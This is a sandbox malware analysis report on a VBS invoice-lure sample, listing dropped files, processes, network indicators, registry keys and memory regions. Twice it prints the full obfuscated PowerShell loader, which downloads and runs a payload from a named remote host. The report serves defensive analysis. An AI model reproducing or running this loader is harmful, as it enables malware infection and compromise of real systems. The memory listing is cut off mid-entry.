Files
| File Path | Type | Category | Malicious |
|---|---|---|---|
| Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs | ASCII text, with CRLF line terminators | initial sample | |
| C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression | dropped | |
| C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | data | dropped | |
| C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | data | modified | |
| C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l30usody.dgt.ps1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qeygavsh.bih.psm1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qltk43lb.rg3.psm1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ur1ensrl.2se.ps1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Roaming\Kinetoplast.Liq | ASCII text, with very long lines (65536), with no line terminators | dropped | |
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs"
|
||
C:\Windows\System32\PING.EXE
|
ping gormezl_6777.6777.6777.677e
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous
Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty;
for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function
Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid
'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri
IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso
fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid
'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC
ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir
HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays
(Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa
opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S
r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di
kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b
ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE
egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn
n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC
viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid
' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS
riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays
($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis
cle[Hand$TypeV EksgNsketGrshi Indg AuthUneqekampd K ne lufnPol s Paa]Unma=Helv$ S ro P.erRan iTricgHotei SunnOuttaJerntSkare
ygi ');$Praege=Lymnaeid 'Forl$.denG MeeyChapmBlitns.staoutrsOpdyi SpeuAfblmKoll. RusDIneqoN nfwSupenTaarlKommoteglaPsykd AmeF
Humi Surl EskeS,em(Vesi$ LanAg.itdU koaFortp Ta tSprii C.avState E.tlDopey Klo, Sel$ Ap cad ehConceMatheSusts Ho e Ge mpolio
counPrergTraue SkarPreei KvanAmt,gP ed)Abse ';$cheesemongering=$Odisere;Orfrays (Lymnaeid ' Cen$UnfogS raLReceOPermBcel.aUkvalLevi:
Kd RAa sEs.ollUne,A imltAddiiDansvBrusEUndetLed S Med= ,er( StiTDenoESlagsrootTurte-frigpPhalaWil TOverHglyc Hush$P vecSoveHTrumeManke
iblS TriEPrecm SamO R pn E kgBogsEUngurAdreiTwe nPreigBo t)Sol ');while (!$Relativets) {Orfrays (Lymnaeid ' van$IndsgUndelS,nsoVibrbFolkaPo,yl
A.p:vandSF yvcRakeuWinit,lbaiInkobjupor ffia Joun,mascG nahAllei ForaHead=En o$Tetrt SvorVr guSamkeTamb ') ;Orfrays $Praege;Orfrays
(Lymnaeid ',ondsKorntHjerAwhi R Hidt ara-Ca tSHaevlSaksE,nineJ erpPenn Rot4Tele ');Orfrays (Lymnaeid 'Eksa$SquiG NonlSippO
etbTiliAParilMist:KeyeR enaeTherlOpslaUndet .agi Catv U.meRkketB ags ann=Haan(G osTForrETurbSBlysTIceq- S.mpAfkaAUndetRecaHGirn
Sig$ optCBarbhB ckeCem eSimiSJensEHutcMKjolo Supn,xiogPl dESen.rAnt iBr mNPr fGUn.a)inte ') ;Orfrays (Lymnaeid ' Pro$BestgLugtLPallOPro
BAfteABlokLP rt:StivtTeleOH,veRLotht VarUBlocRgrafR Klbe FlidOvals P,rK,visaStvlBPalmeTrk,RRrgtnRdl eLive= For$ExhiGUnshl
JamONysgBAfdeaUnflLAbst:SuitRInteY s tT BriTIntoEUn ursvarSAbonkJerseArriREmignUd.ae Ove+ .ac+ Ov.%B an$JantDMentOMarcbKameBBl,vE
ModL ProtKhelH Faketrstd None Shyr.einN vinefortSPant.EndecagroOInwrUBra N,nsttAvli ') ;$Adaptively=$Dobbelthedernes[$Torturredskaberne];}$Raatret=335849;$Afft=30088;Orfrays
(Lymnaeid 'Vag.$UdlngFablL P eOTh wbOmniaPerklfeud: ranMU ilIWi tLMetaJ lmobCopuEUdklS .obkLandy FalTTr ntSasheSteml aulsDoorEKontSPreaSSpooeBrneKHypstUlykO
ConrSkri ear,= dou orsGKlimeKultT Eu -PunnCBilaOCo tNIslnTGrovE tarn C,ptskyd Stat$LnfrCTen hDireeAffeEReinsCercE esaMMaleOFluoN
onsGRoseEPlairStavi npaNBenhg Ego ');Orfrays (Lymnaeid 'Peri$Embrg QuilSu.foBallbFod a AdelF rb:HabrV autigebermaniiRekrdLoveiJensgrecoeOpdrnEfteo
Benu GossHors Heli=hous Krop[SionSRepryAlonsErintK,seeD ffmBest.Bes,CCentoEmannVennv skee RecrSpintD.ms] Und:Falc:NummFStasr
Ejeo FalmDvalBproraVedlsAcroeBeed6V by4 ChrSOmskt ForrPolsiFolknOverg Pr (Pels$BedyMDikki F.rl orjFordbBorse IldsDrunkL neyLungt
Sp t FraeVu.glT.ansOmste PresSquosI tre FibkBiblt uloCaderBom ) Zoo ');Orfrays (Lymnaeid ' Kom$ Ba gFleelOrgaO amsbHe,eaDobblDo
n:BagtY isln,eunkDalrSLotho ccoMIfres,erotSve Ktti=,yrr seu[Precs H sYFo ksRistTJunkeAfklmPyro.raasTEftee RegxNedvtShun.
Arme.nfenKatnCkindoMangdLepti k inMariG na]Over:Nonc:KalaAK,glsPimpcAdeaIkermI Lie.RumngF lse M ktAntesBlo,TManirExpoiAlien
E sG Min(Inc $E,epvKolliAngiR ajiAnlgd gneIWilegUddiEHy,eNSi koKommuMi is G a)Verf ');Orfrays (Lymnaeid 'Stro$NonsGBispl
ejogirabPe oaSpisl iml:LangTLam H ForaKardnPrefa .oyTBi loHudaLDarkONoncg ubm=Taal$ReviY adeNPallK Tras G eOS arMForsS Po,TM
rp. scasBesmuUnnaBSkjosEn.iTInterCav.IvrtsNGa.mG Unw(.rev$GymnrSubcAA toAUndeTAstrR Br.eDesutBog ,Inte$MythaForrfAva,Frailt
Vil) Rub ');Orfrays $Thanatolog;"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous
Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty;
for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function
Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid
'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri
IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso
fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid
'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC
ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir
HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays
(Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa
opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S
r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di
kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b
ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE
egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn
n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC
viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid
' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS
riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays
($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis
cle[Hand$TypeV EksgNsketGrshi Indg AuthUneqekampd K ne lufnPol s Paa]Unma=Helv$ S ro P.erRan iTricgHotei SunnOuttaJerntSkare
ygi ');$Praege=Lymnaeid 'Forl$.denG MeeyChapmBlitns.staoutrsOpdyi SpeuAfblmKoll. RusDIneqoN nfwSupenTaarlKommoteglaPsykd AmeF
Humi Surl EskeS,em(Vesi$ LanAg.itdU koaFortp Ta tSprii C.avState E.tlDopey Klo, Sel$ Ap cad ehConceMatheSusts Ho e Ge mpolio
counPrergTraue SkarPreei KvanAmt,gP ed)Abse ';$cheesemongering=$Odisere;Orfrays (Lymnaeid ' Cen$UnfogS raLReceOPermBcel.aUkvalLevi:
Kd RAa sEs.ollUne,A imltAddiiDansvBrusEUndetLed S Med= ,er( StiTDenoESlagsrootTurte-frigpPhalaWil TOverHglyc Hush$P vecSoveHTrumeManke
iblS TriEPrecm SamO R pn E kgBogsEUngurAdreiTwe nPreigBo t)Sol ');while (!$Relativets) {Orfrays (Lymnaeid ' van$IndsgUndelS,nsoVibrbFolkaPo,yl
A.p:vandSF yvcRakeuWinit,lbaiInkobjupor ffia Joun,mascG nahAllei ForaHead=En o$Tetrt SvorVr guSamkeTamb ') ;Orfrays $Praege;Orfrays
(Lymnaeid ',ondsKorntHjerAwhi R Hidt ara-Ca tSHaevlSaksE,nineJ erpPenn Rot4Tele ');Orfrays (Lymnaeid 'Eksa$SquiG NonlSippO
etbTiliAParilMist:KeyeR enaeTherlOpslaUndet .agi Catv U.meRkketB ags ann=Haan(G osTForrETurbSBlysTIceq- S.mpAfkaAUndetRecaHGirn
Sig$ optCBarbhB ckeCem eSimiSJensEHutcMKjolo Supn,xiogPl dESen.rAnt iBr mNPr fGUn.a)inte ') ;Orfrays (Lymnaeid ' Pro$BestgLugtLPallOPro
BAfteABlokLP rt:StivtTeleOH,veRLotht VarUBlocRgrafR Klbe FlidOvals P,rK,visaStvlBPalmeTrk,RRrgtnRdl eLive= For$ExhiGUnshl
JamONysgBAfdeaUnflLAbst:SuitRInteY s tT BriTIntoEUn ursvarSAbonkJerseArriREmignUd.ae Ove+ .ac+ Ov.%B an$JantDMentOMarcbKameBBl,vE
ModL ProtKhelH Faketrstd None Shyr.einN vinefortSPant.EndecagroOInwrUBra N,nsttAvli ') ;$Adaptively=$Dobbelthedernes[$Torturredskaberne];}$Raatret=335849;$Afft=30088;Orfrays
(Lymnaeid 'Vag.$UdlngFablL P eOTh wbOmniaPerklfeud: ranMU ilIWi tLMetaJ lmobCopuEUdklS .obkLandy FalTTr ntSasheSteml aulsDoorEKontSPreaSSpooeBrneKHypstUlykO
ConrSkri ear,= dou orsGKlimeKultT Eu -PunnCBilaOCo tNIslnTGrovE tarn C,ptskyd Stat$LnfrCTen hDireeAffeEReinsCercE esaMMaleOFluoN
onsGRoseEPlairStavi npaNBenhg Ego ');Orfrays (Lymnaeid 'Peri$Embrg QuilSu.foBallbFod a AdelF rb:HabrV autigebermaniiRekrdLoveiJensgrecoeOpdrnEfteo
Benu GossHors Heli=hous Krop[SionSRepryAlonsErintK,seeD ffmBest.Bes,CCentoEmannVennv skee RecrSpintD.ms] Und:Falc:NummFStasr
Ejeo FalmDvalBproraVedlsAcroeBeed6V by4 ChrSOmskt ForrPolsiFolknOverg Pr (Pels$BedyMDikki F.rl orjFordbBorse IldsDrunkL neyLungt
Sp t FraeVu.glT.ansOmste PresSquosI tre FibkBiblt uloCaderBom ) Zoo ');Orfrays (Lymnaeid ' Kom$ Ba gFleelOrgaO amsbHe,eaDobblDo
n:BagtY isln,eunkDalrSLotho ccoMIfres,erotSve Ktti=,yrr seu[Precs H sYFo ksRistTJunkeAfklmPyro.raasTEftee RegxNedvtShun.
Arme.nfenKatnCkindoMangdLepti k inMariG na]Over:Nonc:KalaAK,glsPimpcAdeaIkermI Lie.RumngF lse M ktAntesBlo,TManirExpoiAlien
E sG Min(Inc $E,epvKolliAngiR ajiAnlgd gneIWilegUddiEHy,eNSi koKommuMi is G a)Verf ');Orfrays (Lymnaeid 'Stro$NonsGBispl
ejogirabPe oaSpisl iml:LangTLam H ForaKardnPrefa .oyTBi loHudaLDarkONoncg ubm=Taal$ReviY adeNPallK Tras G eOS arMForsS Po,TM
rp. scasBesmuUnnaBSkjosEn.iTInterCav.IvrtsNGa.mG Unw(.rev$GymnrSubcAA toAUndeTAstrR Br.eDesutBog ,Inte$MythaForrfAva,Frailt
Vil) Rub ');Orfrays $Thanatolog;"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
| Name | IP | Malicious |
|---|---|---|
| http://nuget.org/NuGet.exe | unknown | |
| http://crl.micro | unknown | |
| http://pesterbdd.com/images/Pester.png | unknown | |
| https://aka.ms/pscore6lB_q | unknown | |
| https://orthoimplantcenter.ro | unknown | |
| http://www.apache.org/licenses/LICENSE-2.0.html | unknown | |
| https://go.micro | unknown | |
| https://contoso.com/ | unknown | |
| https://nuget.org/nuget.exe | unknown | |
| https://contoso.com/License | unknown | |
| https://contoso.com/Icon | unknown | |
| http://orthoimplantcenter.ro | unknown | |
| https://orthoimplantcenter.ro/Bestyret.ocx | 188.241.183.45 | |
| https://aka.ms/pscore68 | unknown | |
| http://wicroft.com | unknown | |
| https://orthoimplantcenter.ro/Bestyret.ocxXR1lX | unknown | |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | unknown | |
| https://github.com/Pester/Pester | unknown | |
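8 further URLs are hidden in this view of the report. Of the URLs listed above, only https://orthoimplantcenter.ro/Bestyret.ocx has a resolved IP address (188.241.183.45); the others are listed with IP "unknown".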
Domains
| Name | IP | Malicious |
|---|---|---|
| gormezl_6777.6777.6777.677e | unknown | |
| bg.microsoft.map.fastly.net | 199.232.214.172 | |
| orthoimplantcenter.ro | 188.241.183.45 | |
IPs
| IP | Domain | Country | Malicious |
|---|---|---|---|
| 188.241.183.45 | orthoimplantcenter.ro | Romania | |
Registry
| Path | Value | Malicious |
|---|---|---|
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableAutoFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableAutoFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableConsoleTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | ConsoleTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | MaxFileSize | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileDirectory | |
4 further registry entries are hidden in this view of the report.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
5F1A000
|
trusted library allocation
|
page read and write
|
||
95EB000
|
direct allocation
|
page execute and read and write
|
||
1DE999BE000
|
trusted library allocation
|
page read and write
|
||
8A40000
|
direct allocation
|
page execute and read and write
|
||
356B000
|
heap
|
page read and write
|
||
1B470DC3000
|
heap
|
page read and write
|
||
1B834FB000
|
stack
|
page read and write
|
||
1B470C95000
|
heap
|
page read and write
|
||
1B470C72000
|
heap
|
page read and write
|
||
7FFE7E150000
|
trusted library allocation
|
page read and write
|
||
7FFE7E110000
|
trusted library allocation
|
page read and write
|
||
4EC7000
|
trusted library allocation
|
page read and write
|
||
1B470B27000
|
heap
|
page read and write
|
||
1B470C80000
|
heap
|
page read and write
|
||
926FEBE000
|
stack
|
page read and write
|
||
7FFE7DF9C000
|
trusted library allocation
|
page execute and read and write
|
||
8427000
|
stack
|
page read and write
|
||
73C0000
|
heap
|
page read and write
|
||
1DE87F9F000
|
heap
|
page read and write
|
||
73D0000
|
heap
|
page read and write
|
||
1B470C21000
|
heap
|
page read and write
|
||
1B470B43000
|
heap
|
page read and write
|
||
32C0000
|
heap
|
page read and write
|
||
1B827FA000
|
stack
|
page read and write
|
||
7FFE7E250000
|
trusted library allocation
|
page read and write
|
||
1B46EE01000
|
heap
|
page read and write
|
||
1B470CD0000
|
heap
|
page read and write
|
||
1DE897E0000
|
trusted library allocation
|
page read and write
|
||
1DE87E30000
|
heap
|
page read and write
|
||
1B470D71000
|
heap
|
page read and write
|
||
3130000
|
trusted library allocation
|
page read and write
|
||
9410000
|
direct allocation
|
page execute and read and write
|
||
3170000
|
heap
|
page readonly
|
||
3120000
|
trusted library allocation
|
page read and write
|
||
4D60000
|
heap
|
page read and write
|
||
791E000
|
stack
|
page read and write
|
||
8780000
|
trusted library allocation
|
page read and write
|
||
1DEA2092000
|
heap
|
page read and write
|
||
1B46EE35000
|
heap
|
page read and write
|
||
1B470CD8000
|
heap
|
page read and write
|
||
1DE89E43000
|
trusted library allocation
|
page read and write
|
||
7FFE7E230000
|
trusted library allocation
|
page read and write
|
||
1B46EE62000
|
heap
|
page read and write
|
||
1DE89DE9000
|
trusted library allocation
|
page read and write
|
||
3114000
|
trusted library allocation
|
page read and write
|
||
1DE8B6F4000
|
trusted library allocation
|
page read and write
|
||
1B470CD7000
|
heap
|
page read and write
|
||
1DE89951000
|
trusted library allocation
|
page read and write
|
||
1DEA20B6000
|
heap
|
page read and write
|
||
926FF3E000
|
stack
|
page read and write
|
||
8A10000
|
trusted library allocation
|
page read and write
|
||
5F01000
|
trusted library allocation
|
page read and write
|
||
1B82BFE000
|
stack
|
page read and write
|
||
1DE8B6CB000
|
trusted library allocation
|
page read and write
|
||
7FFE7E200000
|
trusted library allocation
|
page read and write
|
||
1DEA213E000
|
heap
|
page read and write
|
||
1DE8A04A000
|
trusted library allocation
|
page read and write
|
||
1B470C57000
|
heap
|
page read and write
|
||
313A000
|
trusted library allocation
|
page execute and read and write
|
||
85A4000
|
heap
|
page read and write
|
||
3100000
|
trusted library allocation
|
page read and write
|
||
1B470B53000
|
heap
|
page read and write
|
||
7FFE7E0C2000
|
trusted library allocation
|
page read and write
|
||
1B470C80000
|
heap
|
page read and write
|
||
1B470CA9000
|
heap
|
page read and write
|
||
1A59FE60000
|
heap
|
page read and write
|
||
1DE87F5A000
|
heap
|
page read and write
|
||
1DEA1E50000
|
heap
|
page read and write
|
||
1B470CDD000
|
heap
|
page read and write
|
||
8A20000
|
trusted library allocation
|
page read and write
|
||
1B470B53000
|
heap
|
page read and write
|
||
8AF0000
|
direct allocation
|
page read and write
|
||
1B470C78000
|
heap
|
page read and write
|
||
7FFE7DF90000
|
trusted library allocation
|
page read and write
|
||
1B82EFF000
|
stack
|
page read and write
|
||
533E000
|
trusted library allocation
|
page read and write
|
||
1B470CA5000
|
heap
|
page read and write
|
||
8560000
|
heap
|
page read and write
|
||
7FFE7E180000
|
trusted library allocation
|
page read and write
|
||
1B470B6F000
|
heap
|
page read and write
|
||
1B470C57000
|
heap
|
page read and write
|
||
7FFE7E220000
|
trusted library allocation
|
page read and write
|
||
7A10000
|
trusted library allocation
|
page read and write
|
||
1DEA2174000
|
heap
|
page read and write
|
||
1B470B3F000
|
heap
|
page read and write
|
||
1DE87F9D000
|
heap
|
page read and write
|
||
1A59FD60000
|
heap
|
page read and write
|
||
1B470DF1000
|
heap
|
page read and write
|
||
1B470C80000
|
heap
|
page read and write
|
||
335F000
|
heap
|
page read and write
|
||
7FFE7E260000
|
trusted library allocation
|
page read and write
|
||
1DE881C5000
|
heap
|
page read and write
|
||
1DEA2068000
|
heap
|
page read and write
|
||
1B470CE3000
|
heap
|
page read and write
|
||
32CC000
|
heap
|
page read and write
|
||
7FFE7E1B0000
|
trusted library allocation
|
page read and write
|
||
3180000
|
heap
|
page read and write
|
||
8A50000
|
trusted library allocation
|
page read and write
|
||
7FFE7E0E0000
|
trusted library allocation
|
page read and write
|
||
1B470C72000
|
heap
|
page read and write
|
||
1B470CF9000
|
heap
|
page read and write
|
||
1DE87F64000
|
heap
|
page read and write
|
||
1B470C95000
|
heap
|
page read and write
|
||
1B470C80000
|
heap
|
page read and write
|
||
1DE99C39000
|
trusted library allocation
|
page read and write
|
||
1B830FC000
|
stack
|
page read and write
|
||
7FFE7E0B0000
|
trusted library allocation
|
page execute and read and write
|
||
8510000
|
trusted library allocation
|
page read and write
|
||
1B470D20000
|
heap
|
page read and write
|
||
9270B0D000
|
stack
|
page read and write
|
||
7FFE7E080000
|
trusted library allocation
|
page read and write
|
||
1B470B4F000
|
heap
|
page read and write
|
||
7FFE7E1F0000
|
trusted library allocation
|
page read and write
|
||
76BF000
|
heap
|
page read and write
|
||
1B470C46000
|
heap
|
page read and write
|
||
8950000
|
heap
|
page read and write
|
||
7FFE7E140000
|
trusted library allocation
|
page read and write
|
||
7980000
|
trusted library allocation
|
page read and write
|
||
1DE8A503000
|
trusted library allocation
|
page read and write
|
||
7FFE7E09A000
|
trusted library allocation
|
page read and write
|
||
7FFE7E091000
|
trusted library allocation
|
page read and write
|
||
1B470B33000
|
heap
|
page read and write
|
||
1DE881A0000
|
heap
|
page readonly
|
||
1B470CDA000
|
heap
|
page read and write
|
||
927003C000
|
stack
|
page read and write
|
||
4D1E000
|
stack
|
page read and write
|
||
8440000
|
trusted library allocation
|
page read and write
|
||
1B470B27000
|
heap
|
page read and write
|
||
7630000
|
heap
|
page read and write
|
||
7A00000
|
trusted library allocation
|
page read and write
|
||
1DE89947000
|
heap
|
page read and write
|
||
7761000
|
heap
|
page read and write
|
||
5F15000
|
trusted library allocation
|
page read and write
|
||
1B470C80000
|
heap
|
page read and write
|
||
1B470C95000
|
heap
|
page read and write
|
||
8A30000
|
trusted library allocation
|
page read and write
|
||
1B470C97000
|
heap
|
page read and write
|
||
1DE87F62000
|
heap
|
page read and write
|
||
1B46EDBC000
|
heap
|
page read and write
|
||
1B470B3A000
|
heap
|
page read and write
|
||
1DEA2064000
|
heap
|
page read and write
|
||
1B46EDFF000
|
heap
|
page read and write
|
||
9270B8B000
|
stack
|
page read and write
|
||
7FFE7E0C5000
|
trusted library allocation
|
page read and write
|
||
1B470C92000
|
heap
|
page read and write
|
||
7260000
|
heap
|
page execute and read and write
|
||
3185000
|
heap
|
page read and write
|
||
1DEA23B0000
|
